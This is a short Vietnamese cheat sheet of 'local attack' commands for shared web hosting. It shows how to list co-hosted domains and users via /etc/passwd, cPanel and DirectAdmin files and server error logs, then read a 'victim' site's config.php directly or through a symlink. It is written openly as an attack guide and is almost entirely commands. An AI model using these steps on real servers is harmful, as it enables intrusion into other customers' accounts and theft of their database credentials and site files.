1. Xem tên domain trên cùng 1 host
ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia
- Trường hợp đặc biết khi không thể xem user nằm cùng host thì thêm && vào
cd /etc/vdomainaliases && ls -lia2. Xem tên user
cat /etc/passwd
less /etc/passwd
more /etc/passwd
tail /etc/passwd
rev /etc/passwd
tac /etc/passwd
- Ngoài ra ta có thể dùng lệnh sau để xem user
+ Với cpanel
ls -la /etc/valiases/domain.comThay domain.com bằng tên miền của site bạn muốn xem user
ví dụ:
ls -la /etc/valiases/quylevhb.com
+ Với Directadmin
cat /etc/virtual/domainowners- Còn rất nhiều cách để tìm user của victim như xem error log …
tail -n 10000 /var/log/httpd/domains/domain.com.error.logcat /usr/local/apache/logs/error_log | grep “domain.com” >>”user.txt”
* Đối với nginx
cat /var/log/nginx/error_log
Hoặc
cat /var/log/nginx/domain.com.error.log
3. Local sang victim
dir /pathPath: là đường dẫn đến thư mục cần xem
ví dụ:
dir /home/quylevhb/public_html
4. Xem nội dung file
cat /path/tên-file.phpví dụ:
cat /home/quylevhb/public_html/config.php
5. Symlink
ln -s /path/tên-file quylevhb.txtví dụ:
ln -s /home/quylevhb/public_html/config.php quylevhb.txt
6. Một số lệnh khác
- mkdir: Tạo thư mục
- touch: tạo file
- cp: copy file
- mv: di chuyển file hoặc thư mục
- rm: Xóa file
- rmdir: xóa thư mục
Một số lệnh thông dụng trong local attack
4/
5
Oleh
Unknown